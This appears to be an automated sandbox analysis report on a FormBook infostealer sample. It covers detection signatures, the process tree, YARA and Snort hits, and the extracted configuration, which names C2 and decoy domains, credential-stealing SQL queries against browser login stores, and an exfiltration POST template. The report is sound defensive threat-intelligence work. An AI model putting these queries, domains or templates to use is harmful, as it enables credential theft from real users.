Loading ...

Play interactive tourEdit tour

Analysis Report J0OmHIagw8.exe

Overview

General Information

Sample Name:J0OmHIagw8.exe
Analysis ID:339323
MD5:92ff500a693078263908c83b4b290481
SHA1:fa5dcc6012c71490efdf320791a90c7a18958a95
SHA256:767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Tries to download HTTP data from a sinkholed server
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • J0OmHIagw8.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\J0OmHIagw8.exe' MD5: 92FF500A693078263908C83B4B290481)
    • schtasks.exe (PID: 5856 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 4116 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
    • vbc.exe (PID: 5800 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 3448 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 5864 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", "escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\J0OmHIagw8.exe' , ParentImage: C:\Users\user\Desktop\J0OmHIagw8.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', ProcessId: 5856

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhTAvira URL Cloud: Label: phishing
          Source: http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhTAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for submitted fileShow sources
          Source: J0OmHIagw8.exeVirustotal: Detection: 31%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: J0OmHIagw8.exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: J0OmHIagw8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: J0OmHIagw8.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
          Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop ebx5_2_00406A94
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi5_2_0040C3D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi5_2_0040C3AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi8_2_030FC3AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi8_2_030FC3D7
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx8_2_030F6A96

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49755
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
          Source: TrafficSnort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49771
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
          Tries to download HTTP data from a sinkholed serverShow sources
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:16:25 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: 